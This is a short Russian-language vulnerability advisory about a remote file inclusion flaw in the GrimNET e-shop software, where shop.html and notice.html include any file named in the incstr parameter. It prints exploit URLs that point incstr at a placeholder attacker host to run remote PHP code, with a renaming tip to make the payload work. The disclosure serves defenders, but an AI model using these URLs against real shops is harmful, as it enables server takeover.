Программа: GrimNET e-shop

Недавно была обнаружена уязвимость в корейской системе электронных магазинов
GrimNET e-shop. Сценарии shop.html и notice.html включают (include) любой файл, указанный в
переменной incstr без какой бы то ни было проверки ее содержимого.

Пример/эксплоит:

http://[victim]/shop.html?incstr= http://[hacker]/myfile.php
http://[victim]/notice.html?incstr= http://[hacker]/myfile.php

Примечание: если на хосте http://[hacker]/ установлен php, то сценарию (в нашем случае
myfile.php) надо дать иное расширение, например
myfile.inc.

Обнаружил уязвимость: NivaX (nivax@web-hack.ru),
www.web-hack.ru.



Оставить мнение